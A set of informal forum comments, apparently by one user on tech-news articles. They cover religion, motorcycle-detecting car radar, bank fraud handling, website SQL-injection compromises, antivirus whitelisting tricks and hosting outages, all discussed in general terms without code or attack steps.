Well Mr MacKellar certainly isn't shy about trying to tar everyone else with the same brush now is he!
"Christians believe"... "Christians accept"... "This is a crucial Christian belief"
Really! I don't ever remember anyone asking my opinion, and I imagine there are plenty of other Christians out there who feel the same as me.
Mr MacKellar, unless you can provide documentary proof showing the majority of Christians agree with you, please don't try dragging the rest of us down into this!
My biggest worry with the radar system is whether it properly detects motorcycles as well as cars. If it doesn't detect people, then is it likely to detect a bike, which is a similar width when seen front on? I've had enough problems in the past with the detection strips in the road not detecting my bike (an R6, so not exactly small) that I can imagine the radar not spotting me either.
It's bad enough with many car drivers not thinking about their blind spots to consider if there is a bike there, but with this system they're more likely to assume that there's nothing in their blind spot because the system says so, and go ahead and pull out regardless.
That said, personally when passing cars on the motorway etc I always work on the assumption that the driver won't check their blind spot anyway, which limits the danger this system poses!
Getting old sites to work in IE
Surely that's simple enough, MS just need to add a function into IE to allow the user to specify a different user agent, and set it to Opera / Firefox! Then any IE specific code in a webpage won't be run, and history will come full circle! :-)
@Hans, Ian and Solomon
@ Hans Mustermann
Try reading the actual article! It doesn't say that WoW users are the ones who are having their credit card details stolen, it's saying that stolen credit cards (from anywhere) are being used to pay for WoW subscriptions.
"So what do Halifax do? They stop stolen card payments to Blizzard. What would any sensible company do?
GET BLIZZARD TO REPORT THE FUCKING FRAUDULENT TRANSACTIONS AND THE IP ADDRESS TO THE POLICE SO THEY CAN FUCKING SUBPOENA THE ISP FOR THE PHYSICAL ADDRESS ASSIGNED TO THAT IP WHEN THE CREDIT CARD THIEF CONNECTS TO THE SODDING GAME!"
OK, let's have a reality check shall we? 1) Halifax have direct control over which transactions are and are not paid out. 2) Halifax do NOT have control of Blizzard's servers, so rely on contacting them in each case to get the information that's required. 3) Hiding your IP address is relatively simple these days, so getting the IP address that the fraudster connects from doesn't ensure they can track it to the actual criminal. 4) Every one of these fraudulent transactions gets paid for by Halifax, since the end user claims it back. 5) I dread to think how much money it would cost them in manpower and legal fees to track down and prosecute every single fraudster individually.
"If the bank has seen fit to issue me with a card, then they should leave me and my purchases alone. I review my statement each month and if something is wrong I can invoke my buyer protection privileges and the charge will be refunded."
So what you're basically saying is that you want to have your cake and eat it!?! You don't want the bank to stop transactions they feel are dodgy when they are made, yet you expect them to pick up the tab and clear the charge from your card when you find out that they were fraudulent?
I'm certainly not a big fan of many banks, but in this case I have to agree with their actions.
Couldn't agree more. The first thing that went through my head on reading this was that at least it's given them a chance to properly test their procedures, in a way that I doubt they could realistically arrange to do otherwise (at least properly) due to the immense cost involved.
The question now is of course if those in control take the opportunity to learn from this and make adjustments to their procedures, rather than just focus on pointing figures and passing blame.
Bank fraud prevention department
While certainly terrible, I can't help but think that the actions of some banks' fraud prevention departments beat it hands down.
Don't know if it's all banks, but certainly if you're an HSBC client and they detect what they think is a fraudulent transaction on your credit card you get a phone call. Wonderful, except that firstly they withhold their phone number so you can't use caller ID to confirm who's calling, and secondly before they'll go into any details they expect you to provide your security information to confirm who you are! I mean really, you phoned me, you know who I am but who the hell are you? Amusingly if you mention this to them it seems to go right over their heads! Someone I know refused to give out his info until they proved who they were, suggesting that they confirm the value of the last transaction he'd made. They refused so he declined to speak to them further.
Re: Here We Go Again...
"It really is about time that web-hosting organisations got their acts together and took the security of their clients seriously."
While I certainly agree that many organisations need to look a lot more seriously at how they control the security of their equipment and websites, I think it's somewhat heavy handed to just assume that the fault here was with the site's web hosting company.
From the limited information given about what happened here it sounds very similar to a large number of hacks which were done at the end of last year covering thousands of different web sites, pointing visitors towards malicious .js pages to install malware on their machines. In that case it was actually a SQL injection attack that caused the problem, and I wouldn't be surprised if the same was true here.
Now since in many cases (I'd even hazard to say most) the company that hosts the webserver is not the same as the one who designs and develops the website, perhaps you should be directing your annoyance at the developers who are not preventing the SQL injection, rather than the poor hosting guys who have no control over the website code running on their servers.
Honesty for once
"Bell says: "If two things happen at the same time, it doesn't mean one caused the other.""
While I'm sure most of us here already knew it, it's a nice change to see a scientist making this point for once, rather than sticking with the usual line that their conclusion must be fact.
But what about the hacking?
So the article starts off by saying that some people were trying to cheat by hacking the game, and then goes on to tell us about the game itself, but what about the hack itself! What did they do, did it work?
Dammit, you caught my interest then let me down by not providing the info I was expecting! Shame on you reg!
Helmet visors & map reading
Look forward to the day when I get something like this fitted in my helmet displaying on the visor!
Personally, yes I'm perfectly able to read a map, but in reality that doesn't always help with some routes. It's fine when you're going somewhere near to a major junction, but when you're going somewhere in the middle of a large city it becomes a problem. There's no way I can memorise that many turns, junctions and roundabouts accurately, and of course map reading on a bike, even when stationary, is fiddly due to gloves and the map being in a bag! I tend to have a single headphone in my ear under my helmet, connected to my GPS enabled phone in my pocket so I can hear the directions as I ride, but it's far from ideal.
@Ken Hagan: @AC: @Daniel
I think you're missing the point. It's not that the malware author would get you to run both executables. The author produces both files, and then submits the clean file to the AV companies for them to check and add to their whitelist. Then if you get the bad file on your machine your AV software won't pick it up since it will register it as being the good one.
I remember this happening a while ago as well when they lost all comms to one of their DCs, thus taking out their entire DNS infrastructure.
What amazed me then, and still amazes me now, is why they haven't bothered to locate their servers in different physical locations, and on different IP networks. For many small companies I could understand it, but come on, 123-reg is owned by Pipex, and they in turn own several other ISPs, who collectively must surely have more than one datacentre to hold their servers. Why the hell hasn't someone there split their core infrastructure servers across these sites to give them all some redundancy, especially following the first time they had problems like this (that I'm aware of) a couple of years ago.